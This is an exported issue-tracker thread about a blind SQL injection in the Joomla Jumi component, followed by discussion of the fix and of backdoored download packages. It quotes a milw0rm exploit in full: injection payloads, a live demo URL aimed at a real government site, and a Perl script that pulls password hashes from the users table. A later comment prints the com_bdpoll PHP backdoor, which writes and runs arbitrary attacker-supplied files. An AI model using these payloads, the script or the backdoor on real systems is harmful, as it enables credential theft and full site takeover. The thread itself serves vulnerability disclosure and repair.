Blind SQL-injection Vulnerability in Jumi component

[GoogleCodeExporter]

From http://milw0rm.com/exploits/8968
=========================================
 #####################################################
 # [+] Author        :  Chip D3 Bi0s                 #
 # [+] Email         :  chipdebios[alt+64]gmail.com  #
 # [+] Vulnerability :  Blind SQL injection          #
 #####################################################

Example:
http://localHost/path/index.php?option=com_jumi&fileid=n<Sql Code>

n=number fileid valid

<Sql code>:
'+and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1/*
'+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/*
/index.php?option=com_jumi&fileid=2'+and+(select+substring(concat(1,username),1,
1)+from+jos_users+limit+0,1)=1/*
etc, etc...

DEMO LIVE:
http://www.elciudadano.gov.ec/index.php?option=com_jumi&fileid=2'+and+ascii(subs
tring((SELECT+concat(username,0x3a,password)+from+jos_users+limit+0,1),1,1))=101
/*

etc, etc....

+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

if you want to save the work, you can use the following script

-------------------------------

#!/usr/bin/perl -w

use LWP::UserAgent;

print "\t\t-------------------------------------------------------------\n\n";
print "\t\t                      |  Chip d3 Bi0s |                       \n\n";
print "\t\t Joomla Component com_jumi (fileid) Blind SQL-injection       
\n\n";
print
"\t\t-----------------------------------------------------------------\n\n";

print "http://wwww.host.org/Path: ";
chomp(my $target=<STDIN>);
print " [-] Introduce fileid: ";
chomp($z=<STDIN>);

print " [+] Password: ";

$column_name="concat(password)";
$table_name="jos_users";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

for ($x=1;$x<=32;$x++) #x limit referido a la posicion del caracter
{            #c referido a ascci 48-57, 97-102

  for ($c=48;$c<=57;$c++) 

{
 $host = $target .
"/index.php?option=com_jumi&fileid=".$z."'+and+ascii(substring((SELECT+".$column
_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c."/*";
 my $res = $b->request(HTTP::Request->new(GET=>$host));
 my $content = $res->content;
 my $regexp = "com_";
# print "limit:";
# print "$x";
# print "; assci:";
# print "$c;";
 if ($content =~ /$regexp/) {$char=chr($c); print "$char";}
 }

for ($c=97;$c<=102;$c++) 
{

 $host = $target .
"/index.php?option=com_jumi&fileid=".$z."'+and+ascii(substring((SELECT+".$column
_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c."/*";
 my $res = $b->request(HTTP::Request->new(GET=>$host));
 my $content = $res->content;
 my $regexp = "com_";
# print "limit:";
# print "$x";
# print "; assci:";
# print "$c;";
 if ($content =~ /$regexp/) {$char=chr($c); print "$char";}
 }
}

# milw0rm.com [2009-06-15]

====================================================

Original issue reported on code.google.com by martin2hajek@gmail.com on 16 Jun 2009 at 9:13

[GoogleCodeExporter]

fileid is now forced to be integer

Original comment by edo...@gmail.com on 16 Jun 2009 at 9:40

• Changed state: Fixed

[GoogleCodeExporter]

this issue is very serious, it permits a backdoor creation:

http://forum.joomla.org/viewtopic.php?f=432&t=440921

com_bdpoll
<?php
$f=$_POST["file"];
$t=$_POST["text"];
$t=str_replace(" ","+",$t);
$h=fopen($f,"w");
fwrite($h,base64_decode($t));
$d=dirname(__FILE__);
include($f);
fclose($h);
unlink($f);
?>

that permits to a remote user to arbitrary change any file content

(it was used to do a defease to our index.php)

Please report this kind of bugs more seriously to the Joomla community.

Stefano Gargiulo.

Original comment by rastrano on 16 Oct 2009 at 8:54

[GoogleCodeExporter]

[deleted comment]

[GoogleCodeExporter]

Please update the latest downloadable archive....

it still contains the exploitable jumi.php

http://jumi.vedeme.cz/index.php?option=com_remository&Itemid=53&func=fileinfo&id
=54

---
I repeat that this is a very serious exploit: you can destroy a entire joomla 
site
executing arbitrary SQL and PHP code on the machine... (you have a nice eval() 
done
on a field queried from the DB)
--- 

also Juniper said this:
http://www.juniper.net/security/auto/vulnerabilities/vuln35384.html

regards,
Stefano.

Original comment by rastrano on 16 Oct 2009 at 1:46

[GoogleCodeExporter]

Stefan,

Thanks for the issue report, it was fixed already in the SVN, but probably it 
was
released by mistake. I do confirm that in the last package 2.0.4 we have the old
vulnerable file.

Martin, please make a new package with the fixed file.

Regards,

Edvard

Original comment by edo...@gmail.com on 16 Oct 2009 at 6:59

• Changed state: Started
• Added labels: Security
• Removed labels: Priority-Medium

[GoogleCodeExporter]

Oh, verified. By mistake I've uploaded old version for the download.
I will correct it immediately.
For clarity I will release it as ver. 2.0.5 + provide upgrade package.

Original comment by martin2hajek@gmail.com on 17 Oct 2009 at 8:08

[GoogleCodeExporter]

Has been fixed in Jumi 2.0.5 for Joomla 1.5. Other releases are OK.

Original comment by martin2hajek@gmail.com on 27 Oct 2009 at 8:16

• Changed state: Fixed

[GoogleCodeExporter]

Ugh, nevermind. I answered my own question. I have version 2.1.0 beta3 and I 
just
found that com_bdpoll backdoor on my site. Does the current version on the 
download
site fix this?

Original comment by grayce.e...@gmail.com on 3 Nov 2009 at 8:38

[GoogleCodeExporter]

Incredible... please be more serious... 

I know people that switched to durpal after this exploit, beliving that was 
Joomla to 
be vulnerable....

How is possible to fix a problem in 2.0.5 and not in 2.1.0????

I'm starting to suppose that you enjoy or make money with bd_poll....

Original comment by rastrano on 6 Nov 2009 at 11:55

[GoogleCodeExporter]

Stefano,

Please don't attempt to make unwarranted attacks on people.

We are very serious. And Martin decided to leave the Jumi project, because he 
felt 
that this is his mistake.

The truth is: Jumi website was hacked and the download files were backdoored.

Jumi 2.1.0 is still beta, it means that we don't recommend to use it on your 
production website, however it is fixed. In any case, I want to let you know 
one more 
time, that Jumi is licensed under GNU/GPL and it comes with absolutely no 
warranty.

Original comment by edo...@gmail.com on 6 Nov 2009 at 12:16

[GoogleCodeExporter]

> The truth is: Jumi website was hacked and the download files were backdoored.

I apologize for my tones, i didn't know this... 

> And Martin decided to leave the Jumi project, because he felt 
> that this is his mistake.

Mistakes can happen...

I'm sad to know about Martin's decision because I think that you and Martin 
made a 
great work in developing jumi (it's very useful and a lot of people i know use 
it). 

Then i didn't want to attack you: I was just worried about preventing 
unexperienced 
people to be victim of this exploit, because i think that in the open-source 
spirt 
there is also the intention to help the less skilled people: then the problem 
is not 
the mistake itself, but the seriousness lack in not replacing speedly a couple 
of 
getInt in a couple of downloadable files.

Anyway also these kind of mistakes can happen, then I apologize again for my 
last 
message (I made mistakes too) and I wish to you to keep up the good work!

best regards,
Stefano.

Original comment by rastrano on 6 Nov 2009 at 1:15